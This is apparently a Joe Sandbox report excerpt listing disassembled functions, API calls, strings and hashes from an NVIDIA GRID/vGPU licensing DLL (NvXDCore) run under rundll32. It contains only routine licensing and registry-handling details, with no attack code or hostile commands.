Plugin initialized successfully, xrefs: 00007FFDFA8E05C7
service name from NvContainer is, xrefs: 00007FFDFA8E0136
Registering server for NvXDCoreModule, xrefs: 00007FFDFA8E03CE
{C5EDFC9D-B018-41A4-9877-39AB18469C3A}, xrefs: 00007FFDFA8E02FA
APPID, xrefs: 00007FFDFA8E02EC
Registering AppId for NvXDCoreModule, xrefs: 00007FFDFA8E0295

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CreateDeallocateEventFromGuidsInstanceRegisterStringTracestd::_
String ID: APPID$Invalid serviceName received from container. Aborting...$NVSvc$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnInitialize$Plugin initialized successfully$Received OnInitialize() from NvContainer$Registering AppId for NvXDCoreModule$Registering server for NvXDCoreModule$service name from NvContainer is${C5EDFC9D-B018-41A4-9877-39AB18469C3A}
API String ID: 1968691844-2102066953
Opcode ID: 967add5d06b84c5d8c56b8759b27f6d963476dbd5bc791bd59afc3dca4f53967
Instruction ID: 9a82dd4e0bca024000dbb5842a4da50c84059cd88da9637a22d939b1fcf91df8
Opcode Fuzzy Hash: 967add5d06b84c5d8c56b8759b27f6d963476dbd5bc791bd59afc3dca4f53967
Instruction Fuzzy Hash: 80324F36B15B8299E765DF60E8906D933B4FB48788F800276DA6C47BADEF78D254C340

Function 00007FFDFA918920 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 293memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA920630: new.LIBCMT ref: 00007FFDFA920647
Part of subcall function 00007FFDFA920630: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA920656

new.LIBCMT ref: 00007FFDFA918A07
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FFDFA918ADF
OpenMutexW.KERNEL32 ref: 00007FFDFA918BBF
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FFDFA918BEC

Part of subcall function 00007FFDFA8DE228: _Init_thread_footer.LIBCMT ref: 00007FFDFA8DE2EB

GetProcessHeap.KERNEL32 ref: 00007FFDFA918E27
HeapFree.KERNEL32 ref: 00007FFDFA918E35

Strings

NvXDCore.cpp, xrefs: 00007FFDFA918925
Global\GridLicenseUtilMutex-D2FCF701-B1AC-4158-B070-B5944D631573, xrefs: 00007FFDFA918BB1, 00007FFDFA918BD2
GridCloudLicenseStateMachine.cpp, xrefs: 00007FFDFA918B23, 00007FFDFA918C29
InitGridCloudLicenseStateMachine, xrefs: 00007FFDFA918927
Starting cloud license state machine in unlicensed state, xrefs: 00007FFDFA918ACC
GridCloudLicenseStateMachine::GridCloudLicenseStateMachine, xrefs: 00007FFDFA918B4B, 00007FFDFA918C51
Mutex init failed : %s, xrefs: 00007FFDFA918BD9

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Heapswprintf$FreeInit_thread_footerMutexOpenProcess_invalid_parameter_noinfo_noreturn
String ID: Global\GridLicenseUtilMutex-D2FCF701-B1AC-4158-B070-B5944D631573$GridCloudLicenseStateMachine.cpp$GridCloudLicenseStateMachine::GridCloudLicenseStateMachine$InitGridCloudLicenseStateMachine$Mutex init failed : %s$NvXDCore.cpp$Starting cloud license state machine in unlicensed state
API String ID: 2775131440-2565526366
Opcode ID: 3e1b411a10941ab3f44370695e0a0c6bb8ad7326964bb190f5d75fc8ef6b1777
Instruction ID: 28628879bcb70e8f0f25115df6d9a69629aa942b046e80e90a24fe6764b6f1d8
Opcode Fuzzy Hash: 3e1b411a10941ab3f44370695e0a0c6bb8ad7326964bb190f5d75fc8ef6b1777
Instruction Fuzzy Hash: C5E15B32B09B819AE718CF25E8507ED77A4FB49348F804275EA9C97B99DF38E154C700

Function 00007FFDFA914318 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 246COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA908344: new.LIBCMT ref: 00007FFDFA9083EE

new.LIBCMT ref: 00007FFDFA9143E9
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA9143B2

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA9143CD
new.LIBCMT ref: 00007FFDFA9143D6
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA914411
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA91442C
new.LIBCMT ref: 00007FFDFA914435
new.LIBCMT ref: 00007FFDFA914448

Part of subcall function 00007FFDFA946880: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA94689D

std::_Deallocate.LIBCONCRT ref: 00007FFDFA91458A
std::_Deallocate.LIBCONCRT ref: 00007FFDFA91459E
std::_Deallocate.LIBCONCRT ref: 00007FFDFA914677

Strings

dkT, xrefs: 00007FFDFA914557
dkT, xrefs: 00007FFDFA91447C

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_$ExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID: dkT$dkT
API String ID: 16389134-980905629
Opcode ID: a4332fe836277138f18b93c8009ade01d075e11450d59acce4daae34bb349a3f
Instruction ID: 6b66b379dddd1e45d66c0ced48f39c9b4a24b93974e0e26289c50ef58e21a97c
Opcode Fuzzy Hash: a4332fe836277138f18b93c8009ade01d075e11450d59acce4daae34bb349a3f
Instruction Fuzzy Hash: AAA1D176B05B5585EB08CF66E4606AC33A4AB8CBD8B948636DE6D67BD8CF38D415C300

Function 00007FFDFA9137C8 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA908344: new.LIBCMT ref: 00007FFDFA9083EE

new.LIBCMT ref: 00007FFDFA913898
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA913861

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA91387C
new.LIBCMT ref: 00007FFDFA913885
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA9138C0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA9138DB
new.LIBCMT ref: 00007FFDFA9138E4
new.LIBCMT ref: 00007FFDFA9138F7

Part of subcall function 00007FFDFA946880: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA94689D

std::_Deallocate.LIBCONCRT ref: 00007FFDFA913A38
std::_Deallocate.LIBCONCRT ref: 00007FFDFA913A4C
std::_Deallocate.LIBCONCRT ref: 00007FFDFA913AC3

Strings

dkT, xrefs: 00007FFDFA91392A
dkT, xrefs: 00007FFDFA913A05

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_$ExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID: dkT$dkT
API String ID: 16389134-980905629
Opcode ID: 76205748494e673a50c28bcc104ce8cd868de6f17020132323131b16da741343
Instruction ID: a55d39943a78b81d2598ae168247ea839c0d9c18859f5bc35899beba21f89729
Opcode Fuzzy Hash: 76205748494e673a50c28bcc104ce8cd868de6f17020132323131b16da741343
Instruction Fuzzy Hash: 7391FD36B05B5585EB48DF66D4606AD33B9EB48BD8F90823ADE6D97BD8CE38D411C300

Function 00007FFDFA8DF48C Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 249stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32 ref: 00007FFDFA8DF525
SHGetValueW.SHLWAPI ref: 00007FFDFA8DF63B

Strings

Unable to delete authentication token from registry, xrefs: 00007FFDFA8DF7C7
CacheAuthToken, xrefs: 00007FFDFA8DF53D
NvXDCore.cpp, xrefs: 00007FFDFA8DF536
SOFTWARE\NVIDIA Corporation\Global\GridSW, xrefs: 00007FFDFA8DF51E
Reading authentication token, xrefs: 00007FFDFA8DF5BA
Unable to fetch authentication token from registry, xrefs: 00007FFDFA8DF6C0
AuthToken, xrefs: 00007FFDFA8DF629, 00007FFDFA8DF730
Empty authentication token, xrefs: 00007FFDFA8DF888
SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridSW, xrefs: 00007FFDFA8DF515

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Valuelstrcat
String ID: AuthToken$CacheAuthToken$Empty authentication token$NvXDCore.cpp$Reading authentication token$SOFTWARE\NVIDIA Corporation\Global\GridSW$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridSW$Unable to delete authentication token from registry$Unable to fetch authentication token from registry
API String ID: 3187036572-111034611
Opcode ID: 2aab8bdbbcc767c9e0efc328d84f7590555ca47d080b58c6676666a7a5726df7
Instruction ID: cf6e03762eddd73af1d2942a4a796e4c28c89f6819172102ab8f4414ad34a13c
Opcode Fuzzy Hash: 2aab8bdbbcc767c9e0efc328d84f7590555ca47d080b58c6676666a7a5726df7
Instruction Fuzzy Hash: 20C13832B18B8199E714DB60F4504DEB7A8FB88794F900276EA9C57BADEF78D144CB40

Function 00007FFDFA923D70 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 223COMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00000013,?,?,00007FFDFA9247A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FFDFA8DEA05), ref: 00007FFDFA923E0D
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FFDFA923E80
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FFDFA923F71
GetLastError.KERNEL32(?,?,00007FFDFA9247A1,00000000,?,?,00000080,00000013,00000000,00000000,?,?,00007FFDFA8DEA05), ref: 00007FFDFA924064
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FFDFA924080

Strings

Unable to open directory (%s), xrefs: 00007FFDFA923E6D
Failed to get system drive path (%d), xrefs: 00007FFDFA92406D
SystemDrive, xrefs: 00007FFDFA923E06
GridCommonUtils.cpp, xrefs: 00007FFDFA923EBF, 00007FFDFA923FAE, 00007FFDFA9240BD
Unable to fetch the client configuration token file, xrefs: 00007FFDFA923F5E
\Program Files\NVIDIA Corporation\vGPU Licensing\ClientConfigToken, xrefs: 00007FFDFA923E45
isNLSTokenFilePresent, xrefs: 00007FFDFA923EE6, 00007FFDFA923FD7, 00007FFDFA9240E6

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: swprintf$EnvironmentErrorLastVariable
String ID: Failed to get system drive path (%d)$GridCommonUtils.cpp$SystemDrive$Unable to fetch the client configuration token file$Unable to open directory (%s)$\Program Files\NVIDIA Corporation\vGPU Licensing\ClientConfigToken$isNLSTokenFilePresent
API String ID: 2327880762-3378230023
Opcode ID: f11d2bd288e0293d4245d37c9e329689ec308e232cd438afed1439dc73853065
Instruction ID: 1276356079ca283def6a0bbdd0fb423df3beaa094a354a821449580da000c4f0
Opcode Fuzzy Hash: f11d2bd288e0293d4245d37c9e329689ec308e232cd438afed1439dc73853065
Instruction Fuzzy Hash: 07B14C32B18B8295E7148BA4E4506DE77A4FB84398F901176EA9C87BEDDF38D549CB00

Function 00007FFDFA968B30 Relevance: 21.2, APIs: 14, Instructions: 195COMMONLIBRARYCODE

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00007FFDFA968BC3

Part of subcall function 00007FFDFA8B4C20: CreateEventA.KERNEL32 ref: 00007FFDFA8B4C4C

CloseHandle.KERNEL32 ref: 00007FFDFA968BB4
CloseHandle.KERNEL32 ref: 00007FFDFA968C10
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA968C94
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA968CAB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA968CBA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA968CC9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA968CD5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA968D09
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA968D20
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA968D2F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA968D3E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA968D4A
CloseHandle.KERNEL32 ref: 00007FFDFA968D96

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseHandle$Event$Create
String ID:
API String ID: 1549041071-0
Opcode ID: 1de0987bfbf78678eb48ce6fc79e8fd271becc109d311275e15a01aa1ebb116b
Instruction ID: fe40123210a900ed47ed0d5d7204a4351e3579c34667d00c18f464db313f9727
Opcode Fuzzy Hash: 1de0987bfbf78678eb48ce6fc79e8fd271becc109d311275e15a01aa1ebb116b
Instruction Fuzzy Hash: 5B71C332B4A64285EF58DF25E164A7C7394EF45BA0F999A71CA3D933D9CE2CF4818300

Function 00007FFDFA8B433C Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 245registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8B3FD4: RegQueryValueExW.ADVAPI32 ref: 00007FFDFA8B4029

Part of subcall function 00007FFDFA8BEA24: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BEA6E

Part of subcall function 00007FFDFA8B3C94: RegOpenKeyExW.ADVAPI32 ref: 00007FFDFA8B3CEB

Part of subcall function 00007FFDFA8C0864: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8C08CC

std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B447F
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B44CD

Part of subcall function 00007FFDFA8B0920: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA8B096B
Part of subcall function 00007FFDFA8B0920: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA8B0971
Part of subcall function 00007FFDFA8B0920: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA8B0977
Part of subcall function 00007FFDFA8B0920: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA8B097D
Part of subcall function 00007FFDFA8B0920: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA8B0983

std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B450A
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B4573
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B45AE
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B4656
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B4695
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B46C7
RegCloseKey.ADVAPI32 ref: 00007FFDFA8B46D2

Strings

DefaultLogLevel, xrefs: 00007FFDFA8B43A5, 00007FFDFA8B43B4
OriginRules, xrefs: 00007FFDFA8B43F6, 00007FFDFA8B4405

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocatestd::_$_invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
String ID: DefaultLogLevel$OriginRules
API String ID: 536763390-3104795989
Opcode ID: 18fe5868ac3e4d2203944b692ae30855630519383eec40fa974bff6406e3b4bf
Instruction ID: 2dfef29126d83a9ac5f85bc599fec0d2cc317281bad71cde77d02f66d2bb8b88
Opcode Fuzzy Hash: 18fe5868ac3e4d2203944b692ae30855630519383eec40fa974bff6406e3b4bf
Instruction Fuzzy Hash: 9BA19F62B24A8296EB14DF61D8609ED6730FB81BC8F405177EE2D1BA9DCF78D604C780

Function 00007FFDFA8ACCF0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 143libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFDFA8ACD50
GetProcAddress.KERNEL32 ref: 00007FFDFA8ACD80
GetProcAddress.KERNEL32 ref: 00007FFDFA8ACDAC
GetProcAddress.KERNEL32 ref: 00007FFDFA8ACDD8

Part of subcall function 00007FFDFA8AAB70: VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AABB0
Part of subcall function 00007FFDFA8AAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AABDE

LocalAlloc.KERNEL32 ref: 00007FFDFA8ACE75
LocalFree.KERNEL32 ref: 00007FFDFA8ACECD

Strings

OpenSCManagerW, xrefs: 00007FFDFA8ACD46
CloseServiceHandle, xrefs: 00007FFDFA8ACDCE
QueryServiceConfigW, xrefs: 00007FFDFA8ACDA2
OpenServiceW, xrefs: 00007FFDFA8ACD76
Advapi32.dll, xrefs: 00007FFDFA8ACD21

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
String ID: Advapi32.dll$CloseServiceHandle$OpenSCManagerW$OpenServiceW$QueryServiceConfigW
API String ID: 576420853-2874019189
Opcode ID: 81bcd578cec1459cf1dcbd3d417f16b885c54f230b3579af7cd1a880c5a440dd
Instruction ID: ba485cb6789205078bc785233569b4747ef8525d62cd87d522be7c4178d72b46
Opcode Fuzzy Hash: 81bcd578cec1459cf1dcbd3d417f16b885c54f230b3579af7cd1a880c5a440dd
Instruction Fuzzy Hash: A8517C65B2DB0391FB1D9B52E87093537A0BF49B84F4840B6DD2E4A7E8EF7CE4568210

Function 00007FFDFA8DF90C Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 135stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32 ref: 00007FFDFA8DF96C
SHDeleteValueW.SHLWAPI ref: 00007FFDFA8DF984
SHDeleteValueW.SHLWAPI ref: 00007FFDFA8DFA8A

Strings

NLSStandbyServerURL, xrefs: 00007FFDFA8DFA78
Failed to clear the registry value for server URL, xrefs: 00007FFDFA8DFA20
NvXDCore.cpp, xrefs: 00007FFDFA8DF9C8, 00007FFDFA8DF9D7, 00007FFDFA8DFAC6, 00007FFDFA8DFAD5
SOFTWARE\NVIDIA Corporation\Global\GridSW, xrefs: 00007FFDFA8DF965
Failed to clear the registry value for alternate server URL, xrefs: 00007FFDFA8DFB20
NLSServerURL, xrefs: 00007FFDFA8DF972
